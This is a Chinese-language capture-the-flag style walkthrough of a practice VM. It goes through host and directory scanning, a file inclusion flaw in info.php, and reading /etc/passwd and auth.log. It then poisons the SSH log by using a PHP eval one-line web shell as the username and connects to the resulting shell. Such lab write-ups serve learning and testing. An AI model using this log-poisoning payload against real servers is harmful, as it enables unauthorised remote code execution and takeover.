1.寻找靶机
在靶机搭建好,我们要找到靶机的IP地址
我们这里使用kali中的namp扫描
这里我们扫到了几个地址,经过测试后得到靶机地址是192.168.159.151
2.访问靶机地址
3. 接下来进行目录扫描
我们得到了三个地址,我们依次进行访问
4.访问目录
其中index.html就是靶机首界面,也就是那个大西红柿
server-status访问不到东西
只有antibot_image可以访问到东西
5.找到info.php文件
6.查看info.php页面的源代码
发现可以使用文件包含漏洞,参数是image
7.测试文件包含漏洞是否可用
给image传参数,查看一下etc/passwd文件,看看是否可以查到
可以查看到,说明文件包含漏洞存在,那我们就可以使用这个漏洞做一些事情
8. 看看是否可以访问日志文件
/var/log/auth.log
也可以访问到,那么我们可以利用日志写入一句话木马
9.写入一句话木马
原理:利用ssh登录的语句,将用户名改为我们的一句话木马,即使用户名和密码是不对,但是日志文件会将我们的登录信息记录进去,那么就相当于执行了我们的一句话木马
一句话木马语句:
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@192.168.159.151 -p 2211
这里可以使用kali,但是我的kali不行,有点问题
所以我们该用CentOS 7
他会让我们输入密码,我们可以随便输入一个,让报错的信息被日志记录,这样,我们一句话木马也算运行了
10.再次访问日志,查看我们的登录错误信息
11.使用webshell测试连接
这里显示了我们登录错误信息,那么一句话木马应该也写入了,接下来我们使用webshell连接工具进行连接测试
成功连接,所以我们的木马成功写入。